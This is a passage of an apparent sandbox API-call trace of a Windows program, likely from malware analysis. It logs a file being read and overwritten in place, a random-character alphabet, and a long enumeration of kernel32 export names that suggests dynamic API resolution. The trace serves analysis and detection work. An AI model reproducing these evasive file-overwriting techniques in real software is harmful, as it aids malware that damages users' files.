lpNumberOfBytesWritten=0x3f2e1d8*=0x60012, lpOverlapped=0x0) returned 1 [0076.145] ReadFile (in: hFile=0x430, lpBuffer=0x3aa0000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x3f2e1d4, lpOverlapped=0x0 | out: lpBuffer=0x3aa0000*, lpNumberOfBytesRead=0x3f2e1d4*=0x0, lpOverlapped=0x0) returned 1 [0076.145] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.145] WriteFile (in: hFile=0x430, lpBuffer=0x3f2e1f0*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e1d8, lpOverlapped=0x0 | out: lpBuffer=0x3f2e1f0*, lpNumberOfBytesWritten=0x3f2e1d8*=0x108, lpOverlapped=0x0) returned 1 [0076.149] VirtualFree (lpAddress=0x3aa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.153] VirtualFree (lpAddress=0x4110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.161] CloseHandle (hObject=0x430) returned 1 [0076.506] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.510] GetTickCount () returned 0x114ba3b [0076.510] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.514] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.514] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.514] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.518] lstrlenA (lpString="kernel32.dll") returned 12 [0076.518] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.518] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.519] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.519] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.519] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.519] lstrlenA (lpString="ADDATOMA") returned 8 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.519] lstrlenA (lpString="ADDATOMW") returned 8 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.519] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.519] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.519] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.519] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.519] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0076.519] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.519] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.519] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.519] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.519] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.519] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.519] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.519] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.520] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.520] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.520] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.520] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.520] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.520] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.520] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.520] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.520] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.520] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.520] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.520] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.520] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.520] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.520] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.520] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.520] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.520] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.520] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.521] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.521] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.521] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.521] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.521] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.521] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.521] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.521] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.521] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.521] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.521] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.521] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.521] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.521] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.521] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.521] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.521] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.521] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.522] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.522] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.522] lstrlenA (lpString="BEEP") returned 4 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.522] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.522] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.522] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.522] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.522] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.522] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.522] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.522] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.522] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.522] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.522] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.522] lstrlenA (lpString="CANCELIO") returned 8 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.522] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.522] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.522] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.523] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.523] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.523] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.523] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.523] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.523] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.523] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.523] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.523] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.523] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0076.523] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.523] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.523] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.523] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.523] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.523] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.523] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.523] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.524] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.524] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.524] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.524] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.524] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.524] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.524] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.524] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.524] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.524] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.524] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.524] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.524] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.524] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.524] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.524] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.524] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.524] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.524] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.525] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.525] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.525] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.525] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.525] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.525] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.525] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.525] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.525] lstrcpyA (in: lpString1=0x3f2d6e4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.525] 